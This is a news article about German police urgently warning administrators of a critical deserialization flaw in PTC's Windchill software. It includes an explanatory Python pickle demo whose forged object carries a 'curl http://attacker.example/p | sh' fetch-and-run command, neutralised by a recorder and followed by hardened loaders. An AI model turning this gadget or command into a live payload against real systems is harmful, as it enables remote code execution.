Police Fanned Out Early Sunday Brandishing an Advisory of a CVSS 10 Vulnerability

In an unprecedented move, police officers throughout Germany reached out to corporate IT administrators in the early hours of Sunday morning, delivering urgent warnings regarding a critical vulnerability in widely used product lifecycle management software developed by the American vendor PTC. This proactive approach underscored the gravity of the situation, as officials aimed to mitigate potential risks posed by this newly identified flaw.
The officers conveyed a sense of urgency, cautioning the administrators that malicious actors were likely to exploit this vulnerability in PTC’s Windchill software, utilized by manufacturers, and its FlexPLM product, favored by brands and retailers. The police warned that attackers could leverage the vulnerability to exfiltrate sensitive data and deploy crypto-locking ransomware, heightening the stakes for corporate entities that had not yet patched the flaw.
The vulnerability, designated CVE-2026-4681 and tracked as WID-SEC-2026-0822 by Germany's Federal Office for Information Security (BSI), carries a CVSS v4 base score of 9.3 and a CVSS v3.1 base score of 10, the maximum. It allows remote code execution through deserialization of untrusted data: the server rebuilds in-memory objects from bytes the client supplies, so an attacker who controls those bytes also controls which classes get instantiated and which of their code paths run during the load, before any application logic has a chance to validate the input.
While PTC's advisory stated that there was "no evidence of confirmed exploitation affecting PTC customers," it nevertheless listed indicators of compromise and urged companies that find any of them on a Windchill server to notify their security teams immediately. It also provided instructions for workarounds on Apache and IIS HTTP servers, stressing that they should be applied promptly whether or not the system is reachable from the internet, and that a server which could not be patched or mitigated immediately should be disconnected from the internet in the meantime. PTC also offered around-the-clock support on the vulnerability to all customers, regardless of their existing support contracts.
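To make the vulnerability class concrete, here is a small illustrative program written for this article; it is not PTC's code and does not reproduce the Windchill flaw, whose details the advisory does not disclose. It uses Python's pickle as a stand-in for any native object-serialization format: a toy service rebuilds a session object from client-supplied bytes, a forged payload makes the naive loader call an attacker-chosen function, and two hardened loaders refuse it. The `Session` class, the `executed` recorder (standing in for `os.system` so the demo has no side effects) and the command string are all hypothetical.

```python
"""Added example: why 'deserialization of untrusted data' ends in code execution.

Illustrative code for this article, not PTC's code and not the Windchill flaw.
Python's pickle stands in for any native object-serialization format.
"""
import io
import json
import pickle

# Stand-in for os.system/subprocess in a real payload; kept side-effect free
# so the demo is safe to run. Records every command a forged object triggers.
EXECUTED = []


def executed(command):
    EXECUTED.append(command)
    return 0


class Session:
    """The only type the service ever intends to rebuild from client bytes."""

    def __init__(self, user, roles):
        self.user = user
        self.roles = roles


class ForgedSession:
    """Attacker-side class. pickle stores the (callable, args) pair that
    __reduce__ returns; the victim's loader resolves and calls it during load()."""

    def __reduce__(self):
        # Hypothetical command; in a real payload this would be os.system(...).
        return (executed, ("curl http://attacker.example/p | sh",))


def vulnerable_loads(data):
    """The flaw class: whatever global the payload names is resolved and called."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardening step 1: refuse every global except the single type we expect."""

    def find_class(self, module, name):
        if (module, name) == (Session.__module__, Session.__name__):
            return Session
        raise pickle.UnpicklingError(f"refused to load {module}.{name}")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_loads(data):
    """Hardening step 2 (preferred): a data-only format plus explicit validation,
    so the bytes can never name code at all."""
    obj = json.loads(data)
    if not isinstance(obj, dict) or set(obj) != {"user", "roles"}:
        raise ValueError("malformed session")
    if not isinstance(obj["user"], str) or not isinstance(obj["roles"], list):
        raise ValueError("malformed session")
    if not all(isinstance(r, str) for r in obj["roles"]):
        raise ValueError("malformed session")
    return Session(obj["user"], list(obj["roles"]))


def demo():
    """Run the three loaders against a forged payload and a legitimate one."""
    EXECUTED.clear()
    forged = pickle.dumps(ForgedSession())            # attacker-constructed bytes
    legit = pickle.dumps(Session("alice", ["reader"]))  # what the service expects
    results = {}

    vulnerable_loads(forged)
    results["vulnerable_ran"] = list(EXECUTED)        # command ran during load()

    try:
        restricted_loads(forged)
        results["restricted"] = "loaded"
    except pickle.UnpicklingError as exc:
        results["restricted"] = str(exc)
    results["restricted_legit_user"] = restricted_loads(legit).user

    results["safe_user"] = safe_loads(b'{"user": "bob", "roles": ["admin"]}').user
    try:
        safe_loads(b'{"user": "bob", "roles": ["admin"], "extra": 1}')
        results["safe_rejects_extra"] = False
    except ValueError:
        results["safe_rejects_extra"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The point of the two hardened loaders is the ordering of trust: `RestrictedUnpickler` still lets the attacker drive the parser and only blocks the final class lookup, which is why an allow-list must be a single exact type rather than a module prefix, whereas the JSON path never gives the input a way to name code in the first place and is the fix to reach for when the format is under your control.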
Mach Schneller! Es Gibt Eine CVE! (Hurry Up! There's a CVE!)
The extraordinary measures taken by Germany’s Federal Criminal Police Office to mobilize companies’ administrators for urgent patching efforts have raised eyebrows and sparked discussions across various platforms. Many commenters on German cybersecurity publication Heise and IT blogs such as BornCity reported that police officers visited the homes of some system administrators at around 3 a.m. or 4 a.m., presenting physical copies of the advisory sent by PTC the day before. In some cases, police had attempted to reach the admins by phone before their in-person visits, but many recipients mistook the calls for scams or jokes and chose not to answer. Some individuals even reported that their companies weren’t utilizing the affected PTC products.
One particularly surprised comment captured the general sentiment: “We’re astonished by this approach. PTC usually manages such vulnerabilities without panic. Fixes typically arrive during the next CPS update.” This level of proactive intervention by law enforcement was described as a remarkable deviation from the norm. No individuals in the discussions indicated having previously encountered such police involvement in cybersecurity issues.
Detective Chief Inspector Philipp Hasse, a spokesperson for the Lower Saxony State Criminal Police Office, confirmed to Information Security Media Group on Wednesday that the Federal Criminal Police Office had provided a list of affected companies. The office's cybercrime unit began phoning these companies on Saturday evening and then visited in person those it could not reach by phone.
Hasse clarified, “The objective was to heighten awareness and encourage the swift implementation of protective measures.” He elaborated that companies unable to be contacted by phone were informed via email, which contained a detailed warning about the critical vulnerability along with specific recommendations for risk mitigation based on the vendor’s advisories. The Lower Saxony State Criminal Police considered this immediate notification both effective and targeted in aiming to prevent further and potentially severe damage to the affected companies.
Additionally, Hasse verified the legitimacy of an email sent by his office to the companies, which a BornCity blog reader had flagged. This communication noted “concrete evidence” of the affected software’s usage within the companies in question. The email warned that the vulnerability in Windchill was anticipated to be actively exploited by cybercriminals, potentially leading to data theft and ransomware execution. Consequently, an independent review was requested urgently, emphasizing the likelihood of imminent cyberattacks.
PTC had not responded to a request for comment at the time of publication. Representatives of the Federal Criminal Police Office (BKA) confirmed that such measures fall within its standard operating procedures when a concrete threat has been assessed. The BKA said it had become aware of the critical vulnerability the previous Friday and had then informed the state criminal police offices so that the warning reached affected companies in time.